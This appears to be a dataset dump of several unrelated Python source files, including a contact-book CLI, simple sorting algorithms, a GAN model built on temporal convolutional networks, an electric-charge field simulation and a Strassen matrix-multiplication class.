blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
ebaf1a3b8d691b0712f450da76b3726ccd345d9b | Python | Jelle12345/Python-3 | /oefeningen.py | UTF-8 | 2,238 | 3.640625 | 4 | [] | no_license | contacten = {}
def main():
    """Run the contact-book command loop.

    Shows the menu, reads one-letter commands from stdin and dispatches
    to the matching handler until the user enters 's' (stop).
    """
    menu()
    keuze = input("Maak een keuze")
    while keuze != 's':
        if keuze == 'm':
            nieuw_contact()
        elif keuze == 't':
            toon_contacten()
        elif keuze == 'v':
            verwijder_contact()
        elif keuze == 'a':
            contact_aanpassen()
        elif keuze == 'o':
            contact_opslaan()
        # Re-display the menu and prompt for the next command.
        menu()
        keuze = input("Maak een keuze")
def menu():
    """Print the main menu of the contact book, one option per line."""
    options = (
        "m: maak nieuw contact",
        "t: toon je contactenlijst",
        "s: stop je programma",
        "v: verwijder contact",
        "a: contact aanpassen",
        "o: contact opslaan",
    )
    for option in options:
        print(option)
def toon_contacten():
    """Print a small header, every stored contact as "name: number",
    and six blank lines of trailing whitespace."""
    print("-" * 10)
    print("Uw contacten: ")
    print("-" * 10)
    regels = ["{}: {}".format(naam, nummer) for naam, nummer in contacten.items()]
    print("\n".join(regels))
    print("\n" * 6)
def verwijder_contact():
    """Ask for a contact name and remove that entry from the book.

    Raises KeyError (like the original ``del``) when the name is unknown.
    """
    naam = input("noem het contact dat je wil verwijderen")
    contacten.pop(naam)
def nieuw_contact():
    """Prompt for a name and a phone number, echo them back, and store
    the pair in the contact book."""
    naam = input("geef een naam voor je contact")
    nummer = input("geef het telefoonnummer van je contact")
    print("dit is je contact {} {}".format(naam, nummer))
    contacten[naam] = nummer
def contact_aanpassen():
    """Show the contacts, ask which one to change, and update its number.

    The full list is displayed before the prompt and (only on a
    successful update) again afterwards.
    """
    def _print_overzicht():
        # Header, one "name: number" line per contact, then whitespace.
        print("-" * 10)
        print("Uw contacten: ")
        print("-" * 10)
        print("\n".join("{}: {}".format(naam, nummer)
                        for naam, nummer in contacten.items()))
        print("\n" * 6)

    _print_overzicht()
    aanpas = input("geef de naam van je contact dat je wil aanpassen")
    if aanpas in contacten:
        contacten[aanpas] = input("geef je nieuwe telefoonnummer")
        _print_overzicht()
def contact_opslaan():
    """Display the contact list once and persist it to contact.txt.

    Each contact is written as one line of the form "<name> <number>".
    Fixes vs. the original: the display block ran inside a
    ``for contact in contacten`` loop, reprinting the whole list once per
    contact; ``contacten1 = "".join(contacten)`` was never used; and
    ``f.close()`` was redundant inside the ``with`` block.
    """
    # Show the current contents exactly once.
    print("-" * 10)
    print("Uw contacten: ")
    print("-" * 10)
    print('\n'.join("{}: {}".format(k, v) for k, v in contacten.items()))
    print("\n" * 6)
    # "w+" truncates any previous file; the with-block closes it for us.
    with open("contact.txt", "w+") as f:
        for naam, nummer in contacten.items():
            f.write(naam + " " + nummer + "\n")
    print("je lijst is opgeslagen in contact.txt")
main() | true |
995fe5f30b068e5d137f3765243bb975d3b237ad | Python | imucici/my-learning-note | /LeetCode/week3/389. Find the Difference.py | UTF-8 | 325 | 3.15625 | 3 | [] | no_license | class Solution:
def findTheDifference(self, s: str, t: str) -> str:
    """Return the first character of ``t`` whose occurrence count
    exceeds its count in ``s`` (i.e. the letter that was added).

    Assumes lowercase ASCII letters, tracked in a 26-slot tally.
    """
    tally = [0] * 26
    base = ord("a")
    for ch in s:
        tally[ord(ch) - base] += 1
    for ch in t:
        slot = ord(ch) - base
        tally[slot] -= 1
        if tally[slot] < 0:
            return ch
| true |
3f0509def5a7d68227d33ba015bf515b0ef835fe | Python | vbirdchong/LearnPython | /algorithm/bead_sort.py | UTF-8 | 600 | 3.171875 | 3 | [] | no_license | #!/usr/bin/env python
# coding:utf-8
try:
from itertools import zip_longest
except:
try:
from itertools import izip_longest as zip_longest
except:
zip_longest = lambda *args: map(None, *args)
def beadsort(l):
    """Bead sort: return the values of ``l`` sorted in descending order.

    Each value e is represented as a row of e "beads" ([1] * e); two
    transpositions through columns() let the beads "fall", and the row
    lengths of the result are the sorted values. Only meaningful for
    non-negative integers.

    Fixes vs. the original: the Python-2 ``print l`` debug statements
    (a SyntaxError under Python 3) were removed, and the result is
    materialised with list() so a concrete list is returned even where
    map() is lazy (Python 3).
    """
    return list(map(len, columns(columns([[1] * e for e in l]))))
def columns(l):
    """Transpose a ragged list of lists, dropping the None padding that
    zip_longest inserts (and any other falsy entries, exactly as the
    original ``filter(None, ...)`` did).

    Fix vs. the original: under Python 3 ``filter`` returns lazy
    iterator objects, so the caller's ``len`` calls failed; the inner
    comprehension yields real lists instead.
    """
    return [[item for item in row if item] for row in zip_longest(*l)]
# Demonstration code: sorts the sample list with bead sort and prints
# the result (descending order, e.g. [7, 5, 4, 3, 1, 1, 1]).
print(beadsort([5,3,1,7,4,1,1]))
| true |
46c93b1282fdf1752ff5018510408f2f5b1eafe9 | Python | pedro1hen1/treinamento | /lista_04/ex23.py | UTF-8 | 1,878 | 3.9375 | 4 | [] | no_license | # /bin/env python
# -*- encode: utf-8 -*-
__author__ = '@pedro1hen1'
# exercicio 23
"""Em uma competição de ginástica, cada atleta recebe votos de sete jurados.
A melhor e a pior nota são eliminadas. A sua nota fica sendo a média dos votos
restantes. Você deve fazer um programa que receba o nome do ginasta e as notas dos
sete jurados alcançadas pelo atleta em sua apresentação e depois informe a sua
média, conforme a descrição acima informada (retirar o melhor e o pior salto e
depois calcular a média com as notas restantes). As notas não são informados ordenadas.
Um exemplo de saída do programa deve ser conforme o exemplo abaixo:
"""
def ex23():
    """Interactively collect athletes' jump results and report them.

    For each athlete (until an empty name is entered): read five jump
    distances, list them, then drop the best and the worst jump and
    print the average of the remaining three.

    NOTE(review): the module docstring above describes a gymnastics
    exercise with seven judges, but this implementation reads five jump
    distances per athlete -- confirm which exercise statement applies.
    """
    nome_atleta = True  # sentinel so the while loop runs at least once
    n_atleta = 1        # 1-based athlete counter
    while nome_atleta != '':
        saltos = []     # the five jump distances of the current athlete
        print("\n" * 5)
        print("Atleta n°", n_atleta)
        nome_atleta = input("Digite o nome do atleta: ")
        if nome_atleta == '':
            break  # empty name ends the whole program
        else:
            n_salto = 1
            print("\n" * 3)
            for i in range(5):
                print("Salto n° ", n_salto)
                distancia_salto = float(input("Digite a distancia do salto: "))
                saltos.append(distancia_salto)
                n_salto += 1
            print("Atleta: ", nome_atleta)
            n_salto = 1
            count = 0
            for i in range(5):
                print(n_salto, "° salto : ", saltos[count], " m")
                n_salto += 1
                count += 1
            print("Melhor salto: ", max(saltos), " m")
            print("Pior salto: ", min(saltos), " m")
            # Drop one occurrence each of the best and worst jump, then
            # average the remaining three values.
            saltos.remove(max(saltos))
            saltos.remove(min(saltos))
            media = sum(saltos) / len(saltos)
            print("Media dos demais saltos: ", round(media, 2))
            print("Resultado Final: \n", nome_atleta, " : ", round(media, 2))
            n_atleta += 1


ex23()
| true |
b04f9c82e133b0bf91c87258f06b5e6da4391154 | Python | Alexflames/water | /tppython/t21Grigoriev.py | UTF-8 | 4,482 | 3.5 | 4 | [] | no_license | # Классы: печатное издание, журнал, книга, учебник
class Paper:
    """A printed publication, identified by its publisher, year and title."""

    def __init__(self, publisher, year, title):
        self.publisher = publisher  # issuing publisher
        self.year = year            # year of publication
        self.title = title          # publication title
class Magazine(Paper):
    """A periodical: a Paper that additionally carries an issue number
    and the month it appeared in."""

    def __init__(self, publisher, year, title, number, month):
        super().__init__(publisher, year, title)
        self.number = number  # issue number
        self.month = month    # month of issue
class Book(Paper):
    """A book: a Paper with a topic, an author and a page count."""

    def __init__(self, publisher, year, title, topic, author, pages):
        super().__init__(publisher, year, title)
        self.topic = topic    # subject area
        self.author = author  # author name
        self.pages = pages    # number of pages
class SchoolBook(Book):
    """A textbook: a Book that also records its intended audience."""

    def __init__(self, publisher, year, title, topic, author, pages,
                 purpose):
        super().__init__(publisher, year, title, topic, author, pages)
        self.purpose = purpose  # intended audience / purpose of the textbook
# Sample objects exercising each level of the publication hierarchy.
paper = Paper('Саратовский мясокомбинат', 2019, 'Пособие по нарезке мяса')
magazine = Magazine('Саратовский мясокомбинат', 2019, 'Мясник недели',
                    444, 4)
book = Book('GreenPeace', 2019, 'The extreme danger of Saratov butchers',
            'nature, society', 'J.K. Rowling', 500)
school_book = SchoolBook('неСГУ', 2015, 'Как разложить противника на ряд Фурье',
                         'самооборона', 'Вася Демидович', 15350,
                         'Студенты 3 курса факультета неКНИТ')
class Vector:
    """A float vector supporting indexing, ==/!=, negation, addition,
    element-wise or scalar multiplication, Euclidean norm,
    sum-normalisation and a collinearity check."""

    def __init__(self, comp):
        """Build the vector from an iterable of numbers.

        Entries are coerced to float; on the first entry that cannot be
        converted a message is printed and conversion stops (the already
        converted prefix is kept), matching the original behaviour.
        """
        self.comp = []
        try:
            for i in range(len(comp)):
                icomp = float(comp[i])
                self.comp.append(icomp)
        except ValueError:
            print("Вектор должен состоять из чисел а не строк!")

    def __getitem__(self, key):
        return self.comp[key]

    def __setitem__(self, key, value):
        self.comp[key] = value

    def __eq__(self, other):
        # Bug fix: the original returned Vector([]) on a length mismatch,
        # which is truthy, so __ne__ reported vectors of different length
        # as "equal". A comparison must return a bool.
        if len(self.comp) != len(other.comp):
            print("Количество компонент векторов при сравнении не совпадает")
            return False
        for i in range(len(self.comp)):
            if self[i] != other[i]:
                return False
        return True

    def __ne__(self, other):
        return not (self == other)

    def __neg__(self):
        """Component-wise negation."""
        return Vector(list(map(lambda x: -x, self.comp)))

    def __add__(self, other):
        # On a length mismatch the original prints a message and returns
        # an empty vector as a sentinel; kept for compatibility.
        if len(self.comp) != len(other.comp):
            print("Количество компонент векторов при сложении не совпадает")
            return Vector([])
        new_vector = Vector([])
        for i in range(len(self.comp)):
            new_vector.comp.append(self[i] + other[i])
        return new_vector

    def __mul__(self, other):
        """Scalar multiplication for int/float, element-wise otherwise."""
        if isinstance(other, (int, float)):
            return Vector(list(map(lambda x: x * other, self.comp)))
        if len(self.comp) != len(other.comp):
            print("Количество компонент векторов при умножении не совпадает")
            return Vector([])
        new_vector = Vector([])
        for i in range(len(self.comp)):
            new_vector.comp.append(self[i] * other[i])
        return new_vector

    def __str__(self):
        """Render as "(c1, c2, ...)".

        Raises IndexError on an empty vector (unchanged from the original).
        """
        s = "("
        for comp in self.comp[:-1]:
            s = s + str(comp) + ", "
        return s + str(self.comp[-1]) + ")"

    def norma(self):
        """Return the Euclidean norm of the vector."""
        s = 0
        for x in self.comp:
            s += x * x
        return s ** (1 / 2)

    def normalize(self):
        """Divide every component by the component *sum*, rounded to two
        decimals. NOTE(review): this is sum-normalisation, not unit-norm;
        it is what collinear() relies on."""
        s = 0.
        for x in self.comp:
            s += x
        return Vector(list(map(lambda x: round(x / s, 2), self.comp)))

    @staticmethod
    def collinear(v1, v2):
        """Two vectors count as collinear when their sum-normalised forms
        coincide component-wise (after rounding)."""
        return v1.normalize() == v2.normalize()
import t21graphGrigoriev as GGraph
# Ad-hoc demonstration of the Vector API, followed by the graph tests
# from the companion module imported above as GGraph.
v1 = Vector([3,4,5])
v2 = Vector([3,4,5])
print(v1 == v2)
v2[2] = 6
print(v1 == v2)
print(v1)
print(v1.norma())
print(v1.normalize())
v3 = Vector([6, 8, 10])
print(v3.normalize())
# v3 is 2 * v1, so the collinearity check should hold.
print(Vector.collinear(v1, v3))
print(v1 + v2)
print(v1 * v2)
print(v1 * 5)
print("-------------------------------------------")
print("--------------Работа с графами-------------")
print("-------------------------------------------")
GGraph.run_tests()
| true |
9d89a3e2538364646699ef4290ba12fa4e8c8dbe | Python | EhsanAghazadeh/pytorch-GAN-timeseries | /models/convolutional_models.py | UTF-8 | 5,584 | 2.96875 | 3 | [] | no_license | import torch
import torch.nn as nn
from torch.nn.utils import weight_norm
class Chomp1d(nn.Module):
    """Trims the trailing ``chomp_size`` time steps from an (N, C, T)
    tensor.

    In this file it is applied after a padded causal convolution so the
    extra right-side padding is cut off and the output length matches
    the input length again.
    """

    def __init__(self, chomp_size):
        super().__init__()
        self.chomp_size = chomp_size

    def forward(self, x):
        trimmed = x[:, :, :-self.chomp_size]
        return trimmed.contiguous()
class TemporalBlock(nn.Module):
    """One residual block of the TCN.

    Two weight-normalised dilated convolutions, each followed by a
    Chomp1d (removing the causal padding), ReLU and dropout, plus a
    residual connection. When the channel count changes, the shortcut
    is adapted with a 1x1 convolution.
    """
    def __init__(self, n_inputs, n_outputs, kernel_size, stride, dilation, padding, dropout=0.2):
        super(TemporalBlock, self).__init__()
        # First causal conv; Chomp1d removes the trailing `padding`
        # steps so no future time step leaks into the output.
        self.conv1 = weight_norm(nn.Conv1d(n_inputs, n_outputs, kernel_size,
                                           stride=stride, padding=padding, dilation=dilation))
        self.chomp1 = Chomp1d(padding)
        self.relu1 = nn.ReLU()
        self.dropout1 = nn.Dropout(dropout)

        # Second causal conv with identical hyper-parameters.
        self.conv2 = weight_norm(nn.Conv1d(n_outputs, n_outputs, kernel_size,
                                           stride=stride, padding=padding, dilation=dilation))
        self.chomp2 = Chomp1d(padding)
        self.relu2 = nn.ReLU()
        self.dropout2 = nn.Dropout(dropout)

        self.net = nn.Sequential(self.conv1, self.chomp1, self.relu1, self.dropout1,
                                 self.conv2, self.chomp2, self.relu2, self.dropout2)
        # 1x1 conv on the shortcut only when in/out channels differ.
        self.downsample = nn.Conv1d(n_inputs, n_outputs, 1) if n_inputs != n_outputs else None
        self.relu = nn.ReLU()
        self.init_weights()

    def init_weights(self):
        """Initialise all convolution weights from N(0, 0.01)."""
        self.conv1.weight.data.normal_(0, 0.01)
        self.conv2.weight.data.normal_(0, 0.01)
        if self.downsample is not None:
            self.downsample.weight.data.normal_(0, 0.01)

    def forward(self, x):
        # Residual connection: main path + (possibly projected) input.
        out = self.net(x)
        res = x if self.downsample is None else self.downsample(x)
        return self.relu(out + res)
class TemporalConvNet(nn.Module):
    """A stack of TemporalBlocks whose dilation doubles at every level.

    ``num_channels`` gives the output channel count of each level; the
    padding of each block is chosen so the sequence length is preserved.
    """

    def __init__(self, num_inputs, num_channels, kernel_size=2, dropout=0.2):
        super().__init__()
        blocks = []
        for level, out_channels in enumerate(num_channels):
            dilation_size = 2 ** level
            in_channels = num_inputs if level == 0 else num_channels[level - 1]
            blocks.append(
                TemporalBlock(in_channels, out_channels, kernel_size, stride=1,
                              dilation=dilation_size,
                              padding=(kernel_size - 1) * dilation_size,
                              dropout=dropout))
        self.network = nn.Sequential(*blocks)

    def forward(self, x):
        return self.network(x)
class TCN(nn.Module):
    """TemporalConvNet backbone followed by a per-time-step linear
    projection to ``output_size`` channels."""

    def __init__(self, input_size, output_size, num_channels, kernel_size, dropout):
        super().__init__()
        self.tcn = TemporalConvNet(input_size, num_channels,
                                   kernel_size=kernel_size, dropout=dropout)
        self.linear = nn.Linear(num_channels[-1], output_size)
        self.init_weights()

    def init_weights(self):
        """Initialise the projection weights from N(0, 0.01)."""
        self.linear.weight.data.normal_(0, 0.01)

    def forward(self, x, channel_last=True):
        # channel_last=True means x is (batch, seq_len, features); the
        # convolutional backbone expects (batch, features, seq_len).
        features = x.transpose(1, 2) if channel_last else x
        hidden = self.tcn(features)
        return self.linear(hidden.transpose(1, 2))
class CausalConvDiscriminator(nn.Module):
    """Discriminator using causal dilated convolutions; outputs a
    probability for each time step.

    Args:
        input_size (int): dimensionality (channels) of the input
        n_layers (int): number of hidden layers
        n_channel (int): number of channels in every hidden layer
        kernel_size (int): kernel size in all the layers
        dropout (float in [0-1]): dropout rate

    Input: (batch_size, seq_len, input_size)
    Output: (batch_size, seq_len, 1)
    """

    def __init__(self, input_size, n_layers, n_channel, kernel_size, dropout=0):
        super().__init__()
        # Every hidden layer uses the same channel count.
        hidden_channels = [n_channel for _ in range(n_layers)]
        self.tcn = TCN(input_size, 1, hidden_channels, kernel_size, dropout)

    def forward(self, x, channel_last=True):
        logits = self.tcn(x, channel_last)
        return torch.sigmoid(logits)
class CausalConvGenerator(nn.Module):
    """Generator using causal dilated convolutions; expects a noise
    vector for each time step as input.

    Args:
        noise_size (int): dimensionality (channels) of the input noise
        output_size (int): dimensionality (channels) of the output sequence
        n_layers (int): number of hidden layers
        n_channel (int): number of channels in every hidden layer
        kernel_size (int): kernel size in all the layers
        dropout (float in [0-1]): dropout rate

    Input: (batch_size, seq_len, noise_size)
    Output: (batch_size, seq_len, output_size)
    """

    def __init__(self, noise_size, output_size, n_layers, n_channel, kernel_size, dropout=0):
        super().__init__()
        hidden_channels = [n_channel for _ in range(n_layers)]
        self.tcn = TCN(noise_size, output_size, hidden_channels, kernel_size, dropout)

    def forward(self, x, channel_last=True):
        # tanh bounds the generated values to (-1, 1).
        return torch.tanh(self.tcn(x, channel_last))
if __name__ == "__main__":
    # Smoke test: feed random per-time-step noise through the generator,
    # then the generated sequence through the discriminator, printing
    # tensor shapes at every stage.
    #30-dimensional noise
    input = torch.randn(8, 32, 30)
    gen = CausalConvGenerator(noise_size=30, output_size=1, n_layers=8, n_channel=10, kernel_size=8, dropout=0)
    dis = CausalConvDiscriminator(input_size=1, n_layers=8, n_channel=10, kernel_size=8, dropout=0)
    print("Input shape:", input.size())
    fake = gen(input)
    print("Generator output shape:", fake.size())
    dis_out = dis(fake)
    print("Discriminator output shape:", dis_out.size())
| true |
a430fb678de1c63cecdc68c7ae4a49958d466297 | Python | miracode/data-structures | /insertion_sort.py | UTF-8 | 1,273 | 4.5625 | 5 | [
"MIT"
] | permissive |
def insertion_sort(array):
"""
Sort an input array with insertion sort algorithm
The insertion sort algorithm compares an element with the preceeding
ordered element to determine whether the two should be swapped. This will
continue until the preceeding element is no longer greater than the
current element.
Best case scenario: O(n)
- Best case, if an array is already sorted, this algorithm will inspect
every element of the list once to verify it is sorted, no swaps required.
Worst case scenario: O(n^2)
- Worst case, if an array is reversely sorted, each element must be
compared and swapped with every element preceeding it until it reaches
the beginning.
"""
for elem in range(len(array)):
curr = elem
while curr > 0 and array[curr - 1] > array[curr]:
# swap values
array[curr - 1], array[curr] = array[curr], array[curr - 1]
curr -= 1
return array
if __name__ == '__main__':
print insertion_sort.func_doc
array1 = [3, 2, 1]
assert insertion_sort(array1) == [1, 2, 3]
array2 = [1, 2, 3, 5, 4]
assert insertion_sort(array2) == [1, 2, 3, 4, 5]
array3 = range(100, 0, -1)
assert insertion_sort(array3) == range(1, 101)
| true |
401d07729a699f58064b9ae121c9231df3b66b38 | Python | arkavo/Maxwell-ecosystem | /tests/charge_core.py | UTF-8 | 2,361 | 2.59375 | 3 | [
"Apache-2.0"
] | permissive | import numpy as np
import numba
from numba import cuda
from vectors import*
@cuda.jit
def add_field(r,q,space):
    """CUDA kernel: accumulate the inverse-square field of a point charge.

    Each thread handles one cell (tx, ty) of the 2-D ``space`` array and
    adds q / d**2, where d is the distance between that cell and ``r``.

    NOTE(review): the distance term pairs r[0] with ty and r[1] with tx
    (the ``tx*i + ty*(1-i)`` trick swaps the axes) -- confirm the
    intended x/y ordering. The bounds check uses a flattened index while
    the write uses (tx, ty) directly; verify launch configuration matches.
    """
    tx = cuda.threadIdx.x
    ty = cuda.threadIdx.y
    bw = cuda.blockDim.x
    pos = int(tx + ty*bw)  # flattened thread index, used only for the bounds check
    dist2 = 0.0
    for i in range(2):
        dist2 += (r[i] - (tx*i+ty*(1-i)))**2
    dist2 = dist2**0.5  # after this line dist2 holds the distance, not its square
    if pos < space.size:
        if dist2 == 0:
            space[tx,ty] += 0.0  # the cell at the charge itself contributes nothing
        else:
            space[tx,ty] += 1 * q /(dist2)**2
class charge:
    """A point charge with position and velocity that can deposit its
    electric field or potential onto a 2-D ``space`` grid (an object
    exposing ``order``, ``shape`` and ``content``)."""

    def __init__(self,q,r,v):
        self.charge = q    # charge magnitude (sign included)
        self.position = r  # position, indexable as r[0], r[1]
        self.velocity = v

    def add_field(self,space):
        """Add q/d**2 to every grid cell at distance d from the charge.

        NOTE(review): the zero test truncates the distance with int(),
        so every cell closer than 1 unit is skipped, whereas
        add_potential below compares the exact distance -- confirm which
        behaviour is intended.
        """
        dim = space.order
        if dim==2:
            for i in range((space.shape)[0]):
                for j in range((space.shape)[1]):
                    if int(distance(np.array([i,j]),np.array(self.position)))==0:
                        (space.content)[i][j] += 0
                    else:
                        (space.content)[i][j] += 1 * self.charge / (distance(np.array([i,j]),self.position)**2)

    def add_potential(self,space):
        """Add q/d to every grid cell at distance d from the charge."""
        dim = space.order
        if dim==2:
            for i in range((space.shape)[0]):
                for j in range((space.shape)[1]):
                    if distance(np.array([i,j]),self.position)==0:
                        (space.content)[i][j] += 0
                    else:
                        (space.content)[i][j] += 1 * self.charge / distance(np.array([i,j]),self.position)
class charge_line:
    """A straight segment of charge, sampled as point charges along the
    line from ``st`` to ``en`` (via draw_line)."""

    def __init__(self, Q, st, en, V=0, T=0):
        self.charge = Q    # charge assigned to each sampled point
        self.st_pt = st    # segment start point
        self.en_pt = en    # segment end point
        self.velocity = V
        self.rotate = T
        self.path = draw_line(st, en)  # sampled points along the segment

    def add_line_field(self, space):
        """Accumulate the field of every sampled point charge into
        ``space``, printing a progress percentage in place."""
        total = len(self.path)
        for index in range(total):
            point_charge = charge(self.charge, self.path[index], self.velocity)
            point_charge.add_field(space)
            print(str(int(index / total * 100)) + "% done", end="\r")
class charge_circle:
    """An arc/circle of charge, sampled as point charges along its path
    (via draw_circle)."""

    def __init__(self, Q, pt, r, en_=1, st_=0, V=0, T=0):
        self.charge = Q   # charge assigned to each sampled point
        self.center = pt  # circle centre
        self.radius = r
        self.velocity = V
        self.rotate = T
        # draw_circle samples the points between the st_/en_ fractions.
        self.path = draw_circle(pt, r, en=en_, st=st_)

    def add_circle_field(self, space):
        """Accumulate the field of every sampled point charge into ``space``.

        Bug fix: the original iterated with ``prange(self.path)``, but
        ``prange`` is never imported (only ``numba.cuda`` is) and would
        raise a NameError; the intent -- mirroring
        charge_line.add_line_field -- is to iterate over the sampled
        points themselves.
        """
        for point in self.path:
            point_charge = charge(self.charge, point, self.velocity)
            point_charge.add_field(space)
| true |
1b0e4495d095bf77067c6c9e49b866aeec39892d | Python | zolfaShefreie/carpet_factory | /factory_info_action.py | UTF-8 | 12,417 | 2.890625 | 3 | [] | no_license | import address_graph
import math
class info_func:
picture_matrix=[]
result_grath_coloring=[]
min_list_coloring=[]
address=address_graph.address_graph()
def __init__(self):
pass
def default_matrix_multiplication(self,a, b):
new_matrix = [[a[0][0] * b[0][0] + a[0][1] * b[1][0], a[0][0] * b[0][1] + a[0][1] * b[1][1]],[a[1][0] * b[0][0] + a[1][1] * b[1][0], a[1][0] * b[0][1] + a[1][1] * b[1][1]]]
return new_matrix
def matrix_addition(self,matrix_a, matrix_b):
return [[matrix_a[row][col] + matrix_b[row][col]for col in range(len(matrix_a[row]))] for row in range(len(matrix_a))]
def matrix_subtraction(self,matrix_a, matrix_b):
return [[matrix_a[row][col] - matrix_b[row][col]for col in range(len(matrix_a[row]))] for row in range(len(matrix_a))]
def split_matrix(self,a):
matrix_length = len(a)
mid = matrix_length // 2
top_left = [[a[i][j] for j in range(mid)] for i in range(mid)]
bot_left = [[a[i][j] for j in range(mid)] for i in range(mid, matrix_length)]
top_right = [[a[i][j] for j in range(mid, matrix_length)] for i in range(mid)]
bot_right = [[a[i][j] for j in range(mid, matrix_length)] for i in range(mid, matrix_length)]
return top_left, top_right, bot_left, bot_right
def get_matrix_dimensions(self,matrix):
return len(matrix), len(matrix[0])
def strassen(self,matrix_a,matrix_b):
if self.get_matrix_dimensions(matrix_a) == (2, 2):
return self.default_matrix_multiplication(matrix_a, matrix_b)
A, B, C, D = self.split_matrix(matrix_a)
E, F, G, H = self.split_matrix(matrix_b)
p1 = self.strassen(A, self.matrix_subtraction(F, H))
p2 = self.strassen(self.matrix_addition(A, B), H)
p3 = self.strassen(self.matrix_addition(C, D), E)
p4 = self.strassen(D, self.matrix_subtraction(G, E))
p5 = self.strassen(self.matrix_addition(A, D), self.matrix_addition(E, H))
p6 = self.strassen(self.matrix_subtraction(B, D), self.matrix_addition(G, H))
p7 = self.strassen(self.matrix_subtraction(A, C), self.matrix_addition(E, F))
top_left = self.matrix_addition(self.matrix_subtraction(self.matrix_addition(p5, p4), p2), p6)
top_right = self.matrix_addition(p1, p2)
bot_left = self.matrix_addition(p3, p4)
bot_right = self.matrix_subtraction(self.matrix_subtraction(self.matrix_addition(p1, p5), p3), p7)
new_matrix = []
for i in range(len(top_right)):
new_matrix.append(top_left[i] + top_right[i])
for i in range(len(bot_right)):
new_matrix.append(bot_left[i] + bot_right[i])
return new_matrix
# def default_matrix_multiplication(self,matrix_a,matrix_b):# if the matices are 2*2
# matrix_c=[] #c: the result of 'a' and 'b' multiplication
# matrix_c.append([])
# matrix_c.append([])
# matrix_c[0].append(matrix_a[0][0]*matrix_b[0][0]+matrix_a[0][1]*matrix_b[1][0])
# matrix_c[0].append(matrix_a[0][0]*matrix_b[0][1]+matrix_a[0][1]*matrix_b[1][1])
# matrix_c[1].append(matrix_a[1][0]*matrix_b[0][0]+matrix_a[1][1]*matrix_b[1][0])
# matrix_c[1].append(matrix_a[1][0]*matrix_b[0][1]+matrix_a[1][1]*matrix_b[1][1])
# return matrix_c
# def add(self,matrix_a,matrix_b): #addition of two matrices
# matrix_c=[]
# for i in range(0,len(matrix_a)):
# matrix_c.append([])
# for i in range(0,len(matrix_a)):
# for j in range(0,len(matrix_a)):
# matrix_c[i].append(matrix_a[i][j]+matrix_b[i][j])
# return matrix_c
# def sub(self,matrix_a,matrix_b): # subtraction of two matrices
# matrix_c=[]
# for i in range(0,len(matrix_a)):
# matrix_c.append([])
# for i in range(0,len(matrix_a)):
# for j in range(0,len(matrix_a)):
# matrix_c.append(matrix_a[i][j]-matrix_b[i][j])
# return matrix_c
# def split_matrix(self, matrix_a): #divide the matrix into four submatrices
# mid=len(matrix_a)//2
# c1=[]
# for i in range(0,mid):
# c1.append([])
# for j in range(0,mid):
# c1[i].append(matrix_a[i][j])
# c2=[]
# k=0
# for i in range(mid,len(matrix_a)):
# c2.append([])
# for j in range(0,mid):
# c2[k].append(matrix_a[i][j])
# k+=1
# c3=[]
# k=0
# for i in range(0,mid):
# c3.append([])
# for j in range(mid,len(matrix_a)):
# c3[k].append(matrix_a[i][j])
# k+=1
# c4=[]
# k=0
# for i in range(mid,len(matrix_a)):
# c4.append([])
# for j in range(mid,len(matrix_a)):
# c4[k].append(matrix_a[i][j])
# k+=1
# return c1,c3,c2,c4
# def strassen(self,matrix_a,matrix_b):
# if len(matrix_a)==2:
# return info_func.default_matrix_multiplication(matrix_a,matrix_b)
# A, B, C, D = info_func.split_matrix(matrix_a)
# E, F, G, H = info_func.split_matrix(matrix_b)
# p1 = info_func.strassen(A, info_func.sub(F, H))
# p2 = info_func.strassen(info_func.add(A, B), H)
# p3 = info_func.strassen(info_func.add(C, D), E)
# p4 = info_func.strassen(D, info_func.sub(G, E))
# p5 = info_func.strassen(info_func.add(A, D), info_func.add(E, H))
# p6 = info_func.strassen(info_func.sub(B, D), info_func.add(G, H))
# p7 = info_func.strassen(info_func.sub(A, C), info_func.add(E, F))
# top_left = info_func.add(info_func.sub(info_func.add(p5, p4), p2), p6)
# top_right = info_func.add(p1, p2)
# bot_left = info_func.add(p3, p4)
# bot_right = info_func.sub(info_func.sub(info_func.add(p1, p5), p3), p7)
# # construct the new matrix from our 4 quadrants
# new_matrix = []
# for i in range(len(top_right)):
# new_matrix.append(top_left[i] + top_right[i])
# for i in range(len(bot_right)):
# new_matrix.append(bot_left[i] + bot_right[i])
# return new_matrix
# def strassen_multiplication(self,matrix_b): #matrix_b is the matrix that user inters
# matrix_a=info_func.picture_matrix #matrix_a is the picture_matrix
# a_rows=len(matrix_a) # number of rows of picture_matrix
# a_columns=len(matrix_a[0]) #number of columns of picture_matrix
# #the dimensions of picture_matrix must be a number of power 2
# if a_rows>a_columns:
# if isinstance(math.log(a_rows,2),float)==True:
# n=math.ceil(math.log(a_rows,2)) #the nearest power of 2 to the current dimension
# for i in range(0,a_rows):
# for j in range(a_columns,2**n):
# matrix_a[i].append(0)
# for i in range(a_rows,2**n):
# matrix_a.append([])
# for j in range(0,2**n):
# matrix_a[i].append(0)
# else:
# n=math.log(a_rows,2)
# for i in range(0,a_rows):
# for j in range(a_columns,2**n):
# matrix_a[i].append(0)
# else:
# if isinstance(math.log(a_columns,2),float)==True:
# n=math.ceil(math.log(a_columns,2))
# for i in range(0,a_rows):
# for j in range(a_columns,2**n):
# matrix_a[i].append(0)
# for i in range(a_rows,2**n):
# matrix_a.append([])
# for j in range(0,2**n):
# matrix_a[i].append(0)
# else:
# n=math.log(a_columns,2)
# for i in range(a_rows,2**n):
# matrix_a.append([])
# for j in range(0,2**n):
# matrix_a[i].append(0)
# b_rows=len(matrix_b)
# b_columns=len(matrix_b[0])
# if b_rows<len(matrix_a) and b_columns<len(matrix_a):
# for i in range(b_rows,len(matrix_a)):
# matrix_b.append([])
# for j in range(0,len(matrix_a)):
# matrix_b[i].append(0)
# for i in range(0,b_rows):
# for j in range(b_columns,len(matrix_a)):
# matrix_b[i].append(0)
# if b_rows>len(matrix_a) and b_columns>len(matrix_a):
# for i in range(len(matrix_a),b_rows):
# matrix_b.pop()
# for i in range(0,len(matrix_a)):
# for j in range(len(matrix_a),b_columns):
# matrix_b[i].pop()
# if b_rows<len(matrix_a) and b_columns>len(matrix_a):
# for i in range(0,b_rows):
# for j in range(len(matrix_a),b_columns):
# matrix_b[i].pop()
